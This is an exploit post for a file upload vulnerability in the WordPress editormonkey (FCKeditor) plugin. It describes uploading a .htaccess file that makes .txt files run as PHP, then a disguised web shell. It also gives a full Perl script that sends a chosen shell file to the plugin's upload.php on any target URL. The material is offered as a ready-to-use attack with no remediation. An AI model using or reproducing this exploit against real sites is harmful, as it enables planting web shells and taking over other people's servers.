标题: WordPress Plugins (editormonkey-FCKe) Multiple File Upload Vulnerabilities
作者 : KedAns-Dz
平台: php
影响 : File Upload
测试:
if test.php =>
creating .htaccess file :
SetHandler application/x-httpd-php
-- and Upload him ^
+ Upload Shrll_php.txt
++ Find him in : http://www.2cto.com /UserFile/shell.php.txt
o0R : ThiS PErl Scr!Pt3 :
#!/usr/bin/perl
system ("title KedAns-Dz");
system ("color 1e");
system ("cls");
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
print <<INTRO;
|==================================================|
|= W0rdPrE3S (editormonkey) Arbitrary Shell Upload |
|= >> Provided By KedAns-Dz << |
|= e-mail : ked-h[at]hotmail.com |
|==================================================|
INTRO
print "\n";
print "[!] Enter URL(f.e: http://target.com): ";
chomp(my $url=);
print "\n";
print "[!] Enter File Path (f.e: C:\\Shell.php.gif): "; # File Path For Upload (usage : C:\\Sh3ll.php.gif)
chomp(my $file=);
my $ua = LWP::UserAgent->new;
my $re = $ua->request(POST $url.'/wp-content/plugins/editormonkey/fckeditor/editor/filemanager/upload/php/upload.php?Type=File',
Content_Type => 'multipart/form-data',
Content =>
[
actions => 'upload',
NewFile => $file,
] );
print "\n";
if($re->is_success) {
if( index($re->content, "Disabled") != -1 ) { print "[+] Exploit Successfull! File Uploaded!\n"; }
else { print "[-] File Upload Is Disabled! Failed!\n"; }
} else { print "[-] HTTP request Failed!\n"; }
exit;
_END_
-----------------------------------------
// SP-thX t0 : { Islampard }